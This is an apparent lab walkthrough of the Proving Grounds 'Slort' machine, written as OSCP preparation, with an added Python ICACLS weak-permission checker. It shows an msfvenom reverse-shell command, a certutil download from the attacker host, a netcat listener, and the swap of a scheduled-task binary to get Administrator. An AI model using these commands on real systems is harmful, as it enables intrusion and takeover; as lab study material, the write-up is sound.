Proving Grounds: Slort

Al1z4deh:~# echo "Welcome"
3 min read, Jan 8, 2023

Today we will take a look at Proving Grounds: Slort. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings:
|   DNSVersionBindReqTCP, Help, NULL:
|_    Host '192.168.49.68' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.68.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
  • Feroxbuster
feroxbuster --url http://192.168.68.53:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.asp,.aspx,.xml

Check the “?page” parameter

RFI

Do a simple RFI check.

Reverse shell

Prepare the payload

Ready; now let’s run it with curl.

We got the shell.

There is a Backup folder in C:\. Let’s look there.

info.txt shows the command that is executed every 5 minutes.

C:\Backup>more info.txt
more info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

Let’s check our permissions on the folder. BUILTIN\Users has full control (F), so we can write to it and delete from it.

PS C:\> icacls Backup
icacls Backup
Backup BUILTIN\Users:(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
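From a defensive angle the listing above is the whole finding: a job that runs with Administrator rights executes a binary from a folder that BUILTIN\Users fully controls. The Python below is an added example (not from the original post) that parses icacls output and flags ACEs giving low-privilege principals write-class rights; the sample listing is copied from above, and the principal and rights sets are the example's own assumptions.

```python
import re
from collections import namedtuple

# Constructed from the `icacls Backup` listing in this post (indented as icacls prints it).
ICACLS_OUTPUT = r"""Backup BUILTIN\Users:(OI)(CI)(F)
       BUILTIN\Administrators:(I)(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
"""

# Principals every local user belongs to (assumed list; extend it for your own domain groups).
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
                       "Everyone", "NT AUTHORITY\\INTERACTIVE"}
# icacls simple and specific rights that let a principal replace or alter files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC", "DE", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:()]+?):(?P<rights>(?:\([^)]*\))+)$")
Ace = namedtuple("Ace", "principal flags")  # flags: one string per (...) group

def parse_icacls(output: str, path: str) -> list:
    """Parse the text printed by `icacls <path>` into Ace records."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        # icacls prints the queried path in front of the first ACE only; drop it.
        if line.startswith(path + " "):
            line = line[len(path):].lstrip()
        m = ACE_RE.match(line)
        if m:  # trailing "Successfully processed ..." lines do not match
            flags = tuple(re.findall(r"\(([^)]*)\)", m["rights"]))
            aces.append(Ace(m["principal"].strip(), flags))
    return aces

def weak_aces(aces: list) -> list:
    """Return ACEs that give low-privilege principals write-class rights."""
    findings = []
    for ace in aces:
        if ace.principal not in LOW_PRIV_PRINCIPALS:
            continue
        # One group may carry several comma-separated specific rights, e.g. (GR,GW).
        granted = {r.strip() for f in ace.flags for r in f.split(",")}
        if granted & WRITE_RIGHTS:
            findings.append(ace)
    return findings

if __name__ == "__main__":
    for ace in weak_aces(parse_icacls(ICACLS_OUTPUT, "Backup")):
        print("WRITABLE by", ace.principal, "".join(f"({f})" for f in ace.flags))
```

Run against the listing above it reports the explicit BUILTIN\Users full-control entry plus the two inherited Authenticated Users modify entries; the inherited RX entry is correctly left alone.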

I create a payload called TFTP.EXE. I’ll move and delete the original file and replace it with my own.

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=21 -f exe > TFTP.EXE 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Delete the original file

C:\Backup>del TFTP.EXE
del TFTP.EXE

Upload our own file.

C:\Backup>certutil -urlcache -split -f http://192.168.49.68/TFTP.EXE
certutil -urlcache -split -f http://192.168.49.68/TFTP.EXE
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.

Listen

└─$ sudo nc -nvlp 21 
[sudo] password for kali:
listening on [any] 21 ...
connect to [192.168.49.68] from (UNKNOWN) [192.168.68.53] 50259
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
slort\administrator

And now we are the Administrator.

“If you have any questions or comments, please do not hesitate to write. Have a good days”
